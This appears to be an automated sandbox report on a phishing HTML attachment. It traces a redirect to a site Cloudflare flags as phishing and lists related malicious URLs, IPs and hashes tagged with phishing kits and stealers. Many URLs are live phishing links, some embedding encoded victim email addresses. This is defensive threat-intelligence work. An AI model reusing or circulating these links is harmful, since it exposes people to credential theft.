Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Electronic_Receipt_ATT0001.htm

Input	Output
URL: https://ktqco.eh5j.com/MlKbF/#W#em11bGxpZ2FuQGhhcm1vbnljYXJlcy5jb20= Model: jbxai	{ "brand":["Cloudflare"], "contains_trigger_text":true, "trigger_text":"This link has been flagged as phishing. We suggest you avoid it.", "prominent_button_name":"Dismiss this warning and enter site", "text_input_field_labels":["Your IP: Click to reveal"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://ktqco.eh5j.com/MlKbF/#W#em11bGxpZ2FuQGhhcm1vbnljYXJlcy5jb20= Model: jbxai

{
"brand":["Cloudflare"],
"contains_trigger_text":true,
"trigger_text":"This link has been flagged as phishing. We suggest you avoid it.",
"prominent_button_name":"Dismiss this warning and enter site",
"text_input_field_labels":["Your IP: Click to reveal"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.0.78.26	https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsulL2bcqZSGb5TVbFOhW-BzJJtb8_QJJBgbE1zqe78Ie8BMxsNyhIFwdKd0pdA90RMhgTdSzkU9EZ9vbhoKh9hWuvNOpIawTAXoH5R0ak3U5rG_o-sZZz3gEiDRvTxtIDu5LY0qOySZABWrjrj9OfeDXHmC1qe7sBrjM2U90kovZKuuD34ZvXQ_OD2Hq--rkZwnu_VhQVAySwVh2ojndP52NUX9X40zwPfUt6TCc4F2rNspoMzray6vSBsFLXUX7nVDHqqILMYBWJr9fSc6AC0-g4meRNvX0rdEgcGztZ5SXk2Zbb1UlFLMFg&sai=AMfl-YQ851Qqa8i013PHKiB6TgTZ-QzfEpO1vcyiniBLSOaNAv3siIC9L9LV3aRq_nbn81w6wFB7OvNqhOdGvo-t7Q&sig=Cg0ArKJSzNuc_g1R_f21EAE&fbs_aeid=&urlfix=1&adurl=https://t.events.caixabank.com/r/?id=h665ab089,6dc7f7ae,f89fd96&p1=d70r46aqireop.cloudfront.net%23QZ~MamRpYXpAZXZlcnNoZWRzLXN1dGhlcmxhbmQuZXM=	Get hash	malicious	HTMLPhisher	Browse
	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse
	http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==	Get hash	malicious	HTMLPhisher	Browse
	message.html	Get hash	malicious	HTMLPhisher	Browse
	https://logon-onsharingcertificatedi365sendocs9796595.org/office-pad/vlaUwdAfIpfKGf2XJxS_WrdMNkszHbvUVYDkFZPz-Vq6Aqaug54vgb2apsffp5s4trjp22w5gdmsztdw6vvohecwj7h6k/#Y29keS5tYW5uQGNlcnRhcmEuY29t	Get hash	malicious	HTMLPhisher	Browse
	https://href.li/?https://0r2Ic.phydrimic.com/6bvcD/#	Get hash	malicious	Unknown	Browse
	47386650-4FA0-4696-9B3A-DAAEB9337919.htm	Get hash	malicious	HTMLPhisher	Browse
	https://www.google.com/url?q=pqreinwfoeoyezuyjlesvcezsamgut&rct=pqreinwfoeoyezuyjlesvcezsamgut&sa=t&esrc=pqreinwfoeoyezuyjlesvcezsamgut&source=&cd=pqreinwfoeoyezuyjlesvcezsamgut&cad=pqreinwfoeoyezuyjlesvcezsamgut&ved=pqreinwfoeoyezuyjlesvcezsamgut&uact=&url=amp/eddieslawn.com/p/d/dxcgz/zsamgut/a3lsZS5rbGVpbkBkYWNvdGFoYmFuay5jb20=	Get hash	malicious	Unknown	Browse
	VT00336QSRG.htm	Get hash	malicious	HTMLPhisher	Browse
	Davislaw_Document_3Pages_Fine.pdf.html	Get hash	malicious	HTMLPhisher	Browse
239.255.255.250	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse
	http://www.johnhdaniel.com	Get hash	malicious	Unknown	Browse
	https://convertwithwave.com	Get hash	malicious	Unknown	Browse
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse
	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	file.exe	Get hash	malicious	Credential Flusher	Browse
	SecureMessageAtt.html	Get hash	malicious	Unknown	Browse
	http://klasstackle.com/lfL15Q57vu4U	Get hash	malicious	HTMLPhisher	Browse
172.67.183.69	Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646f	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	HTMLPhisher	Browse
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	HTMLPhisher	Browse
69.49.245.172	http://aking.nyc	Get hash	malicious	Unknown	Browse	aking.nyc/index.html
	https://5rve2bms.r.eu-west-1.awstrack.me/L0/https:%2F%2Fm.exactag.com%2Fai.aspx%3Ftc=d9279613bc40b07205bbd26a23a8d2e6b6b4f9%26url=%2568%2574%2574%2570%2525%2533%2541kenfong.com%252Fwinner%252F54799%252F%252FbGF3cmVuY2UuZnJhbmNlQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==/1/0102019036933333-15818f27-6536-4f7c-94ff-9a04497bf567-000000/vIL5T4ixe-4lQyI6m0NlGqCl204=379	Get hash	malicious	HTMLPhisher	Browse	kenfong.com/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=http%253Aeyesontheguys.com%2Fwinner%2F03013%2F%2FYnJhbmRvbi5nYXJjaWFAZ3RmY3Uub3Jn	Get hash	malicious	HTMLPhisher	Browse	eyesontheguys.com/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=http%253Aeyesontheguys.com%2Fwinner%2F87707%2F%2FcmVlZC5wZW5kbGV0b25AZXhwZXJpdGVjLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	eyesontheguys.com/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=%68%74%74%70%25%33%41heinleinarchives.net%2Fnew%2F80701%2F%2Fa3Jpc3RpbmUuc29yZW5zZW5AcmVkd2lyZXNwYWNlLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	heinleinarchives.net/favicon.ico
	https://weblaunch.blifax.com/listener3/redirect?l=e6df36b9-5af1-4758-b7e4-83fbf7f30dfb&id=e0d346f1-f241-ee11-acc4-000c295a2555&u=http%253Aeyesontheguys.com%2Fwinner%2F66812%2F%2Fc3RheWxvckBqZWZmcGFyaXNoLm5ldA==	Get hash	malicious	HTMLPhisher	Browse	eyesontheguys.com/favicon.ico
	https://m.exactag.com/ai.aspx?tc=d9496601bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ablessedbeyondproperties.com%2Fwinner%2F71809%2F%2Fam9lbC5zZWFybGVAemJldGEuY29t	Get hash	malicious	HTMLPhisher	Browse	blessedbeyondproperties.com/favicon.ico
	https://manage.kmail-lists.com/subscriptions/subscribe/update?c=01H0G3BVA5P4WT38NKH3DY6QEB&a=WkVYqE&p=eyJUaWNrZXRfb3B0IGluIjogIlllcyJ9&k=53b9cf0c5602fbaff2d592c0e9b9058a&r=bigswitch%25E3%2580%2582co%25E3%2580%2582in///////////portfolio////////wpfile///////////wp-user%25E3%2580%2582////////////hgsusysyues////////amdvbEBiZ2NsaW5pYy5jb20=	Get hash	malicious	HTMLPhisher	Browse	bigswitch.co.in/favicon.ico
	https://r20.rs6.net/tn.jsp?f=001bkqLx4VA9V9-9cjr8F3mS_GZ3jv8wu1CrjGYvCIh7Cs1Zd2hmI2Fg3r2PwcFoev5xVrU6TTCVOPr-JKpFjiZ9SBmfuz2qGwy8tnjDHanCw8QSWiZdRhsKT0p-WHIb6hpQSCvdqLBoOH2xlhGk5fuIw==&c=ihjxwKkEncyzpaCxSndkOynX3sy9ZyN9ejOcfC9DIxWFkctc3VsasA==&ch=MPXyiw2PxuljH9_IywoacMF_OZeEnWl-v3iM5576DBOXsGd6-zP4Sw==&__=/asdf/am9obi5kb2VAbWFsaWNpb3VzLnBoaXNo	Get hash	malicious	HTMLPhisher	Browse	lafamulenta17.com/favicon.ico
	https://agoda.onelink.me/1640755593?pid=Email&c=inquiry_booking&af_dp=agoda%3A%2F%2Fhotel%2FAgoda%2520ABS%2520Dummy%2F2544216%26temp%3D0&adults=2&children=0&rooms=1&checkIn=2022-02-17&checkOut=2022-02-20&los=3&cid=1772772&af_force_dp=true&af_r=http://Co.rwtd.co.za/Co/ZGplZmZlcmlAY28uY2FtZXJvbi50eC51cw==	Get hash	malicious	HTMLPhisher	Browse	co.rwtd.co.za/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cdnjs.cloudflare.com	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	http://klasstackle.com/lfL15Q57vu4U	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://email.mg.pmctraining.com/c/eJwUzDGOhSAQANDTSCfBAQQL2n-PgRmUDaAh_E329hvbVzwKpJF3Ehw2B84ro50WV0j68CYB2SNnQrVvLloHPjtLjAq9KAFAJ7thXDVQWlEdcfVg82oOBTo6s9ucFqPaKZ-W5sDSSz9lupuogbhPrBkT10n4ooxjgU8jXuDzfeqNJJ_rESP8fLGXiXJw6ddd6S3_GnaczPIep_gN8B8AAP__bcA-Lw	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://42yr.rescindq.com/wqtyZAFZzF3hXgsogboKg/	Get hash	malicious	Tycoon2FA	Browse	104.17.25.14
	Audio_Msg..00299229202324Transcript.html	Get hash	malicious	Unknown	Browse	104.17.24.14
	Play_VM-Now(Tina.lawvey)CQDM.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pt9w4x.nauleacepr.com/9QLzRhIr/#Ygovernment.relations@rolls-royce.com	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://vwkugoia0yciq0buttompanj2.ntvultra.com/viciorhthvgh/forhwural/coupletri/QdhahVchT/yEjbKM/anNhbGFzQGhvbGxhbmRjby5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://links.rasa.io/v1/t/eJx1kM2OgjAUhV_FsB6kpUXQ1bzAuJp9c2mvTI1Q0tvGEMO7DzCKC51t73d-em5J9JfksEl-QujpkGXR19A13sUet9q1W4iZJko-NkmLAQwEmOhbQi56jbPwiFe6YAjoXyBswS7mBiwN2nVXGCSTn838PrvPCg8EqkUiaFCFoV9Na2_x9I0Uvv6OK0yxPqMO6tlhsmpjZ8OgppCTbaKHYF33IFflk7Nm1u3LUgDjp5QXRqZ1qU0KOYNUij0T1U7ntaxeOhJ2Rk1_XJJzlsuUs5TxlfOonTf3BF5UohBl9aZCj56mjv9wjzQfV0TIXck5E_I9RBTxjh5dt8wFtQrTgMr18xzrZRzHX-Cephc=#a2FyZW4ubW9vbmV5QGJhbGxhcmRkZXNpZ25zLm5ldA==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Swift_ach Complaints.sppgCQDM.html	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
href.li	https://booking.com-partners.one/confirm/login/qAlElVVF	Get hash	malicious	Unknown	Browse	192.0.78.27
	https://adclick.g.doubleclick.net/pcs/click?xai=AKAOjsulL2bcqZSGb5TVbFOhW-BzJJtb8_QJJBgbE1zqe78Ie8BMxsNyhIFwdKd0pdA90RMhgTdSzkU9EZ9vbhoKh9hWuvNOpIawTAXoH5R0ak3U5rG_o-sZZz3gEiDRvTxtIDu5LY0qOySZABWrjrj9OfeDXHmC1qe7sBrjM2U90kovZKuuD34ZvXQ_OD2Hq--rkZwnu_VhQVAySwVh2ojndP52NUX9X40zwPfUt6TCc4F2rNspoMzray6vSBsFLXUX7nVDHqqILMYBWJr9fSc6AC0-g4meRNvX0rdEgcGztZ5SXk2Zbb1UlFLMFg&sai=AMfl-YQ851Qqa8i013PHKiB6TgTZ-QzfEpO1vcyiniBLSOaNAv3siIC9L9LV3aRq_nbn81w6wFB7OvNqhOdGvo-t7Q&sig=Cg0ArKJSzNuc_g1R_f21EAE&fbs_aeid=&urlfix=1&adurl=https://t.events.caixabank.com/r/?id=h665ab089,6dc7f7ae,f89fd96&p1=d70r46aqireop.cloudfront.net%23QZ~MamRpYXpAZXZlcnNoZWRzLXN1dGhlcmxhbmQuZXM=	Get hash	malicious	HTMLPhisher	Browse	192.0.78.26
	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	192.0.78.27
	https://www.google.co.uk/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.us.m.mimecastprotect.com/s/n0rICERpMNsxN8vRCNfXC76qeb?domain=sharedocx.z13.web.core.windows.net	Get hash	malicious	Unknown	Browse	192.0.78.27
	https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3B	Get hash	malicious	Unknown	Browse	192.0.78.26
	http://t.nypost.com/1/e/r?aqet=clk&r=2&ca=35257893&v0=rhn21600@pvwfzajcv.com&yf=//youtube.com.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&ru=//eddieslawn.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==&yf=//eduyieldyf.com/q/ndppd/aanqtpx/YW1hbmRhLm1pbGxlckB5Ym9ubGluZS5jby51aw==	Get hash	malicious	HTMLPhisher	Browse	192.0.78.26
	message.html	Get hash	malicious	HTMLPhisher	Browse	192.0.78.26
	https://logon-onsharingcertificatedi365sendocs9796595.org/office-pad/vlaUwdAfIpfKGf2XJxS_WrdMNkszHbvUVYDkFZPz-Vq6Aqaug54vgb2apsffp5s4trjp22w5gdmsztdw6vvohecwj7h6k/#Y29keS5tYW5uQGNlcnRhcmEuY29t	Get hash	malicious	HTMLPhisher	Browse	192.0.78.26
	https://href.li/?https://0r2Ic.phydrimic.com/6bvcD/#	Get hash	malicious	Unknown	Browse	192.0.78.26
	2_Redfin.htm	Get hash	malicious	Unknown	Browse	192.0.78.27
uzerapproved.com	Remittance AdviceNote c6b2e2a43485b7b75999a5332e86646f	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	69.49.245.172
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	HTMLPhisher	Browse	69.49.245.172
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	HTMLPhisher	Browse	69.49.245.172
ktqco.eh5j.com	Electronic_Receipt_ATT0001.htm	Get hash	malicious	HTMLPhisher	Browse	104.21.40.89

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	172.67.180.104
	http://www.johnhdaniel.com	Get hash	malicious	Unknown	Browse	104.18.36.155
	https://convertwithwave.com	Get hash	malicious	Unknown	Browse	104.18.30.234
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.152.190
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse	104.26.4.62
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	104.22.51.98
	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecureMessageAtt.html	Get hash	malicious	Unknown	Browse	104.18.86.42
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.183.74
	http://klasstackle.com/lfL15Q57vu4U	Get hash	malicious	HTMLPhisher	Browse	104.21.26.223
AUTOMATTICUS	https://booking.com-partners.one/confirm/login/qAlElVVF	Get hash	malicious	Unknown	Browse	192.0.78.27
	http://www.toyotanation.com//help//terms	Get hash	malicious	Unknown	Browse	192.0.73.2
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	192.0.78.27
	https://pokegamaclub.com/	Get hash	malicious	Unknown	Browse	192.0.76.3
	https://sandbox-2.digital68.com/	Get hash	malicious	Unknown	Browse	192.0.73.2
	https://ebookkeepers.com.pk/	Get hash	malicious	Unknown	Browse	192.0.76.3
	https://jogosderobloxdematazumbie.blogspot.com/	Get hash	malicious	Unknown	Browse	192.0.77.2
	http://dallas-office.com/	Get hash	malicious	Unknown	Browse	192.0.78.22
	https://www.newtoin.com/	Get hash	malicious	Unknown	Browse	192.0.77.2
	http://dev-bdvonlinecreditos.pantheonsite.io/	Get hash	malicious	Unknown	Browse	192.0.77.48
CLOUDFLARENETUS	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	172.67.180.104
	http://www.johnhdaniel.com	Get hash	malicious	Unknown	Browse	104.18.36.155
	https://convertwithwave.com	Get hash	malicious	Unknown	Browse	104.18.30.234
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.152.190
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse	104.26.4.62
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	104.22.51.98
	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	SecureMessageAtt.html	Get hash	malicious	Unknown	Browse	104.18.86.42
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.183.74
	http://klasstackle.com/lfL15Q57vu4U	Get hash	malicious	HTMLPhisher	Browse	104.21.26.223
UNIFIEDLAYER-AS-1US	https://email.mg.pmctraining.com/c/eJwUzDGOhSAQANDTSCfBAQQL2n-PgRmUDaAh_E329hvbVzwKpJF3Ehw2B84ro50WV0j68CYB2SNnQrVvLloHPjtLjAq9KAFAJ7thXDVQWlEdcfVg82oOBTo6s9ucFqPaKZ-W5sDSSz9lupuogbhPrBkT10n4ooxjgU8jXuDzfeqNJJ_rESP8fLGXiXJw6ddd6S3_GnaczPIep_gN8B8AAP__bcA-Lw	Get hash	malicious	HTMLPhisher	Browse	216.172.173.3
	https://sharing.clickup.com/9011385758/t/h/868a15nvk/VTTN7SYFPHZE3IT	Get hash	malicious	HTMLPhisher	Browse	67.20.70.239
	Audio_Msg..00299229202324Transcript.html	Get hash	malicious	Unknown	Browse	69.49.245.172
	Sales_Contract_Main_417053608_09.2024.pdf	Get hash	malicious	Unknown	Browse	108.179.194.43
	https://vwkugoia0yciq0buttompanj2.ntvultra.com/viciorhthvgh/forhwural/coupletri/QdhahVchT/yEjbKM/anNhbGFzQGhvbGxhbmRjby5jb20=	Get hash	malicious	HTMLPhisher	Browse	108.179.252.163
	Sales_Contract_Main_417053608_09.2024.pdf	Get hash	malicious	Unknown	Browse	192.185.12.194
	https://abby-gatenby.com/m/?c3Y9bzM2NV8xX29uZSZyYW5kPVNucEJVREU9JnVpZD1VU0VSMDMwOTIwMjRVNDYwOTAzMDE=N0123N	Get hash	malicious	Unknown	Browse	192.185.129.84
	https://thebrasilians.hosted.phplist.com/lists/lt.php?tid=KkkFBgMBXQUHUEsCB1QHTwZWAFYbCQpVBx0EBQABCgADAgJXVl1FVAIAUVFdUVhPBgUCVBsEA1JVHQ8BW1cUUAQGV1cBAF1aUgNQHVAHBFEFBgVRGwEAVQEdAlcLUBQKBAEDHlMAAVILAVBQBwUDBA	Get hash	malicious	Unknown	Browse	50.6.153.166
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	69.49.245.172
	124d3330_4829.124d3330_4847.pdf.exe	Get hash	malicious	AgentTesla	Browse	108.167.140.123

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	http://www.johnhdaniel.com	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://convertwithwave.com	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse	184.28.90.27 20.114.59.183
	00#U2800.exe	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 20.114.59.183
	https://dvs.ntoinetted.com/kJthYXSER3TmsdtC7bAT5eXqQ/#geir@byggernfauske.no	Get hash	malicious	HTMLPhisher	Browse	184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	184.28.90.27 20.114.59.183
	SecureMessageAtt.html	Get hash	malicious	Unknown	Browse	184.28.90.27 20.114.59.183

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	458
Entropy (8bit):	5.211543572744993
Encrypted:	false
SSDEEP:	12:hYzx7BqhC2zvn7ctQtqqJmrLgFmzD+4Nbx8oA2WCEu:hYzxBqhCwn42R0n+4NBA2JB
MD5:	B220A5645929F878444F485DAB681273
SHA1:	8FC6ABF8067335F33C876E532473840AF6B5E8D4
SHA-256:	2F3F0EDBEA4D6BCB10CA023C011015EA46B83C1116584D0E1AFF1A2833F942BB
SHA-512:	F8CE5E7CE712CDF120901BE6C3E6B76FB09BEDED6F88C6B1669F99F0D1CBA5E91CE1377BFA9452BCEB451C70D2A461181BEF9D36E9FD0010D6171C6265F4A1F5
Malicious:	false
Reputation:	low
URL:	https://href.li/?https://KtqCO.eh5j.com/MlKbF/
Preview:	<!DOCTYPE html>.<html><head>.<title>href.li</title>.<meta http-equiv="Refresh" content="0; url=https://KtqCO.eh5j.com/MlKbF/" />.<meta name="referrer" content="no-referrer" />.<script type="text/javascript">./* <![CDATA[ /.window.location.replace( "https:\/\/KtqCO.eh5j.com\/MlKbF\/" + window.location.hash );./ */.</script>.</head>.<body><p>Redirecting..<br /><a href="https://KtqCO.eh5j.com/MlKbF/">https://KtqCO.eh5j.com/MlKbF/</a></p></body></html>

Chrome Cache Entry: 128

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (394)
Category:	dropped
Size (bytes):	4739
Entropy (8bit):	5.03704848996151
Encrypted:	false
SSDEEP:	96:1j9jwIjYjUDK/D5DMF+k1zvJADh/pRshxrR49PaQxJbGD:1j9jhjYjIK/Vo+kzRADh/pmhxrO9ieJ0
MD5:	7BED2BA7F7BA8CF52B5C99DF9F8090EC
SHA1:	BE70D0EF7BB061CC12C535CE95451F36DB264713
SHA-256:	0123E2A4AAA6ECA6B354E872417CD4E7977444E8A6FFC90989CAB239EBB21D47
SHA-512:	DF03586374632884D8BB2FC938AAF431630AB8BB710D072A97F132BBC5AD80D4BA4433079A0CF7287C4B8F655AC69CFEEDB83B728799BCDECF0322585D38A5D2
Malicious:	false
Reputation:	low
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (394)
Category:	downloaded
Size (bytes):	4739
Entropy (8bit):	5.043794183241972
Encrypted:	false
SSDEEP:	96:1j9jwIjYjUDK/D5DMF+k12vJADh/pRshrR49PaQxJbGD:1j9jhjYjIK/Vo+k2RADh/pmhrO9ieJGD
MD5:	E6621D5A321F1FC033D50CB6109C77D7
SHA1:	DC9E0DF1BD62F931E072643547B4A5F933952DFF
SHA-256:	85664325B3AC2925E834806D029003EED93FD218C68AF306D53265FB8478E71A
SHA-512:	DEBBE522BB4F75645827101DC0BF623D07B831BA4541C090CF854148D9843F21809DF175741BEE15E6A6872FE7D6A9BC402CF262188F152DDA55B9F0D4B9603F
Malicious:	false
